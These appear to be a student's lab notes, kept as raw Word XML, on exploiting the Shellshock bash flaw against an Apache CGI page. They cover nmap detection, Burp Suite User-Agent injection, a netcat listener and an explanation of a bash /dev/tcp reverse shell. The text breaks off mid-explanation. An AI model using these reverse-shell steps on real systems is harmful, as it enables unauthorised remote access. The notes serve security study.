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71DD" w14:textId="72C178BE" w:rsidR="00853ABF" w:rsidRDefault="000A0350">
      <w:r>
        <w:t xml:space="preserve">Exploiting bash </w:t>
      </w:r>
      <w:r w:rsidR="00FC7BDE">
        <w:t>vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E462BD" w14:textId="1A0E1708" w:rsidR="000A0350" w:rsidRDefault="000A0350">
      <w:r>
        <w:t>CVE_2014_6271 (shellshock)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E0AFFF" w14:textId="384C8B1E" w:rsidR="000A0350" w:rsidRDefault="000A0350">
      <w:r>
        <w:t>Allow to run arbitrary commands remotely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABB69D8" w14:textId="76277FF5" w:rsidR="000A0350" w:rsidRDefault="000A0350">
      <w:r>
        <w:t>Affected Services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CDD2F6" w14:textId="55206389" w:rsidR="000A0350" w:rsidRDefault="000A0350">
      <w:r>
        <w:t xml:space="preserve">Apache </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A93434A" w14:textId="00E9D13F" w:rsidR="000A0350" w:rsidRDefault="000A0350">
      <w:r>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6DCDB7" w14:textId="77777777" w:rsidR="000A0350" w:rsidRDefault="000A0350"/>
    <w:p w14:paraId="26F8CF24" w14:textId="523074C2" w:rsidR="00DA6BBE" w:rsidRDefault="00DA6BBE">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> =*nix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A36BA97" w14:textId="173BBB1B" w:rsidR="00DA6BBE" w:rsidRDefault="00DA6BBE">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> based dos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2278B068" w14:textId="3628BAF3" w:rsidR="00F269C2" w:rsidRDefault="00F269C2">
      <w:r>
        <w:t xml:space="preserve">in any distribution of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the default shell is bash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D42029" w14:textId="77777777" w:rsidR="00F269C2" w:rsidRDefault="00F269C2"/>
    <w:p w14:paraId="47486607" w14:textId="230D2535" w:rsidR="00DA6BBE" w:rsidRDefault="00DA6BBE">
      <w:r>
        <w:t>Apache server with CGI or .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> script are also vulnerable to this attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575E5033" w14:textId="4E5764AD" w:rsidR="00DA6BBE" w:rsidRDefault="00DA6BBE">
      <w:r>
        <w:t xml:space="preserve">CGI (common gateway interface) scripts used in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server to run arbitrary commands on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60098177" w14:textId="7C57BA8E" w:rsidR="00DA6BBE" w:rsidRDefault="001D124A">
      <w:r>
        <w:t xml:space="preserve">Now they are </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rearly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393F01FD" w14:textId="77777777" w:rsidR="001D124A" w:rsidRDefault="001D124A"/>
    <w:p w14:paraId="49EE359F" w14:textId="6E11781B" w:rsidR="007526C0" w:rsidRDefault="007526C0">
      <w:r>
        <w:t xml:space="preserve">Inject the commands </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the http header affective technique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3F0161" w14:textId="77777777" w:rsidR="007526C0" w:rsidRDefault="007526C0"/>
    <w:p w14:paraId="4DACC2FF" w14:textId="318576FC" w:rsidR="007526C0" w:rsidRDefault="007526C0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007526C0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4521C9BB" w14:textId="6FFF3850" w:rsidR="00E001AF" w:rsidRPr="007526C0" w:rsidRDefault="00E001AF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Manually:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711F3461" w14:textId="640CDF3B" w:rsidR="007526C0" w:rsidRDefault="0086316F">
      <w:r>
        <w:t xml:space="preserve">Nmap -s V </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip_address_target</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1C163AEC" w14:textId="77777777" w:rsidR="0086316F" w:rsidRDefault="0086316F"/>
    <w:p w14:paraId="59C406E2" w14:textId="49F484BC" w:rsidR="0086316F" w:rsidRDefault="0086316F">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on the browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A93545" w14:textId="223F9184" w:rsidR="0086316F" w:rsidRDefault="0086316F">
      <w:r>
        <w:t>See the time shown and see the source code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E465A67" w14:textId="31AB729E" w:rsidR="0086316F" w:rsidRDefault="0086316F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1958E1A8" wp14:editId="54A76F9E">
            <wp:extent cx="4121362" cy="2927500"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="42515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52398" name="Picture 4251523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9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121B" w14:textId="3F41C8DB" w:rsidR="0086316F" w:rsidRDefault="0086316F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59C35B7D" wp14:editId="7AF44AD2">
            <wp:extent cx="4146763" cy="1149409"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="16178458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45869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763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1E0A" w14:textId="43FE9BC5" w:rsidR="0086316F" w:rsidRDefault="0086316F">
      <w:r>
        <w:t xml:space="preserve">Nmap -s </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">V  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>_ipaddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> –script http-shellshock –script-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  “</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>http-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shellshock.uri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gettime.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452DCF3A" w14:textId="77777777" w:rsidR="0086316F" w:rsidRDefault="0086316F"/>
    <w:p w14:paraId="62023881" w14:textId="77777777" w:rsidR="0086316F" w:rsidRPr="0086316F" w:rsidRDefault="0086316F" w:rsidP="0086316F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086316F">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="0086316F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> What is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0086316F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a URI</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0086316F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3E971D" w14:textId="77777777" w:rsidR="0086316F" w:rsidRPr="0086316F" w:rsidRDefault="0086316F" w:rsidP="0086316F">
      <w:r w:rsidRPr="0086316F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>URI</w:t>
      </w:r>
      <w:r w:rsidRPr="0086316F">
        <w:t xml:space="preserve"> stands for </w:t>
      </w:r>
      <w:r w:rsidRPr="0086316F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Uniform Resource Identifier</w:t>
      </w:r>
      <w:r w:rsidRPr="0086316F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E37FCBE" w14:textId="77777777" w:rsidR="0086316F" w:rsidRPr="0086316F" w:rsidRDefault="0086316F" w:rsidP="0086316F">
      <w:r w:rsidRPr="0086316F">
        <w:t xml:space="preserve">It’s a string that identifies a </w:t>
      </w:r>
      <w:r w:rsidRPr="0086316F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>resource</w:t>
      </w:r>
      <w:r w:rsidRPr="0086316F">
        <w:t xml:space="preserve"> (like a file, page, or service) on the internet or a network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E7CA41" w14:textId="77777777" w:rsidR="0086316F" w:rsidRPr="0086316F" w:rsidRDefault="0086316F" w:rsidP="0086316F">
      <w:r w:rsidRPr="0086316F">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>👉</w:t>
      </w:r>
      <w:r w:rsidRPr="0086316F">
        <w:t xml:space="preserve"> In simple words: a </w:t>
      </w:r>
      <w:r w:rsidRPr="0086316F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>URI is the address/path to something</w:t>
      </w:r>
      <w:r w:rsidRPr="0086316F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECE0BA0" w14:textId="1FCA766D" w:rsidR="00D4016F" w:rsidRDefault="00D4016F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68240DBC" wp14:editId="31C1133F">
            <wp:extent cx="5943600" cy="1014095"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="960247032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47032" name="Picture 3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8E55" w14:textId="77777777" w:rsidR="00D4016F" w:rsidRDefault="00D4016F"/>
    <w:p w14:paraId="46803BDD" w14:textId="21902A36" w:rsidR="00CE35E0" w:rsidRDefault="00CE35E0">
      <w:r>
        <w:t xml:space="preserve">Then after checking that it is vulnerability we use the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CD9990" w14:textId="31613CC1" w:rsidR="00CE35E0" w:rsidRDefault="00BB5523">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Injection in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB5523">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>user-agent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8A67A6" w14:textId="1C3F66C8" w:rsidR="00DA6BBE" w:rsidRDefault="00F83167">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4756D6E8" wp14:editId="36FFA085">
            <wp:extent cx="6422564" cy="254000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1000400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0232" name="Picture 10004002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150" cy="2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F97A" w14:textId="77777777" w:rsidR="00BB5523" w:rsidRDefault="00BB5523"/>
    <w:p w14:paraId="355FF8E2" w14:textId="6964BF2A" w:rsidR="00BB5523" w:rsidRDefault="00BB5523">
      <w:r>
        <w:t>Then I</w:t>
      </w:r>
      <w:r w:rsidR="00F83167">
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> it shows all the users accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FB1809" w14:textId="61F2484F" w:rsidR="00BB5523" w:rsidRDefault="00F83167">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Now</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> get reverse shell out of it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB57FA0" w14:textId="0C959EBC" w:rsidR="00F83167" w:rsidRDefault="00F83167">
      <w:r>
        <w:t xml:space="preserve">Set the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>kali .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="444502B4" w14:textId="4CB6EB9F" w:rsidR="00F83167" w:rsidRDefault="00F83167">
      <w:r>
        <w:t>Nc -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nvlp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081980E7" w14:textId="77777777" w:rsidR="00F83167" w:rsidRDefault="00F83167"/>
    <w:p w14:paraId="3FD6D4F0" w14:textId="33D77761" w:rsidR="00F83167" w:rsidRDefault="007E72DC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C0B9A7A" wp14:editId="0BC96F13">
            <wp:extent cx="5308600" cy="368300"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="14178144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14494" name="Picture 14178144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366" cy="36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5C15" w14:textId="77777777" w:rsidR="00F83167" w:rsidRPr="00F83167" w:rsidRDefault="00F83167" w:rsidP="00F83167">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F83167">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00F83167">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6599ED10" w14:textId="01953DF5" w:rsidR="00F83167" w:rsidRPr="00F83167" w:rsidRDefault="00F83167" w:rsidP="00F83167">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F83167">
        <w:t xml:space="preserve">This is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00F83167">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>path to the Bash shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00F83167">
        <w:t xml:space="preserve"> on Linux/Unix systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D287400" w14:textId="77777777" w:rsidR="00F83167" w:rsidRPr="00F83167" w:rsidRDefault="00F83167" w:rsidP="00F83167">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F83167">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00F83167">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F70122" w14:textId="77777777" w:rsidR="00F83167" w:rsidRPr="00F83167" w:rsidRDefault="00F83167" w:rsidP="00F83167">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F83167">
        <w:t>A flag for Bash meaning:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F83167">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F83167">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>👉</w:t>
      </w:r>
      <w:r w:rsidRPr="00F83167">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F83167">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>“Execute the following string as a command.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19948E52" w14:textId="77777777" w:rsidR="00F83167" w:rsidRDefault="00F83167"/>
    <w:p w14:paraId="0AF177E4" w14:textId="198E7F77" w:rsidR="007E72DC" w:rsidRDefault="007E72DC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E72DC">
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="007E72DC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>file descriptor</w:t>
      </w:r>
      <w:r w:rsidRPr="007E72DC">
        <w:t xml:space="preserve"> is just a </w:t>
      </w:r>
      <w:r w:rsidRPr="007E72DC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>number that represents an open file or stream</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E1E002" w14:textId="77777777" w:rsidR="007E72DC" w:rsidRDefault="007E72DC" w:rsidP="007E72DC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FA86DAF" w14:textId="12DC9F8F" w:rsidR="007E72DC" w:rsidRPr="007E72DC" w:rsidRDefault="007E72DC" w:rsidP="007E72DC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E72DC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E72DC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7B84E056" w14:textId="77777777" w:rsidR="007E72DC" w:rsidRPr="007E72DC" w:rsidRDefault="007E72DC" w:rsidP="007E72DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007E72DC">
        <w:t xml:space="preserve">Starts an </w:t>
      </w:r>
      <w:r w:rsidRPr="007E72DC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>interactive Bash shell</w:t>
      </w:r>
      <w:r w:rsidRPr="007E72DC">
        <w:t xml:space="preserve"> (-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E72DC">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E72DC">
        <w:t xml:space="preserve"> = interactive).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339F368F" w14:textId="77777777" w:rsidR="007E72DC" w:rsidRPr="007E72DC" w:rsidRDefault="007E72DC" w:rsidP="007E72DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007E72DC">
        <w:t>Interactive means it behaves like a normal shell you type into, not just a one-off command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFCD467" w14:textId="77777777" w:rsidR="007E72DC" w:rsidRPr="007E72DC" w:rsidRDefault="007E72DC" w:rsidP="007E72DC">
      <w:r w:rsidRPr="007E72DC">
        <w:pict w14:anchorId="7245DB8E">
          <v:rect id="_x0000_i1052" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="676D660E" w14:textId="77777777" w:rsidR="007E72DC" w:rsidRPr="007E72DC" w:rsidRDefault="007E72DC" w:rsidP="007E72DC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E72DC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. &gt;&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF123FD" w14:textId="77777777" w:rsidR="007E72DC" w:rsidRPr="007E72DC" w:rsidRDefault="007E72DC" w:rsidP="007E72DC">
      <w:r w:rsidRPr="007E72DC">
        <w:t xml:space="preserve">This is </w:t>
      </w:r>
      <w:r w:rsidRPr="007E72DC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>redirection</w:t>
      </w:r>
      <w:r w:rsidRPr="007E72DC">
        <w:t xml:space="preserve"> in Bash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFE993F" w14:textId="77777777" w:rsidR="007E72DC" w:rsidRPr="007E72DC" w:rsidRDefault="007E72DC" w:rsidP="007E72DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007E72DC">
        <w:t>&gt; = redirect output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2549D4F0" w14:textId="77777777" w:rsidR="007E72DC" w:rsidRPr="007E72DC" w:rsidRDefault="007E72DC" w:rsidP="007E72DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007E72DC">
        <w:t xml:space="preserve">&amp; = shorthand to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007E72DC">
        <w:t>say</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E72DC">
        <w:t xml:space="preserve"> "redirect to a file descriptor, not a file."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7AC6DE" w14:textId="77777777" w:rsidR="007E72DC" w:rsidRPr="007E72DC" w:rsidRDefault="007E72DC" w:rsidP="007E72DC">
      <w:r w:rsidRPr="007E72DC">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">So &gt;&amp; means: </w:t>
      </w:r>
      <w:r w:rsidRPr="007E72DC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>"redirect this output somewhere else (like a file descriptor)."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2BF7A9" w14:textId="77777777" w:rsidR="007E72DC" w:rsidRPr="007E72DC" w:rsidRDefault="007E72DC" w:rsidP="007E72DC">
      <w:r w:rsidRPr="007E72DC">
        <w:pict w14:anchorId="7D04BC8F">
          <v:rect id="_x0000_i1053" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC8CD0A" w14:textId="77777777" w:rsidR="007E72DC" w:rsidRPr="007E72DC" w:rsidRDefault="007E72DC" w:rsidP="007E72DC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E72DC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E72DC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E72DC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E72DC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ip_address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E72DC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546EA66A" w14:textId="77777777" w:rsidR="007E72DC" w:rsidRPr="007E72DC" w:rsidRDefault="007E72DC" w:rsidP="007E72DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007E72DC">
        <w:t>Special Bash feature (not a real file, but a virtual interface).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F309AC" w14:textId="77777777" w:rsidR="007E72DC" w:rsidRPr="007E72DC" w:rsidRDefault="007E72DC" w:rsidP="007E72DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007E72DC">
        <w:t>When you write to /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E72DC">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007E72DC">
        <w:t>/host/port:</w:t>
      </w:r>
    </w:p>
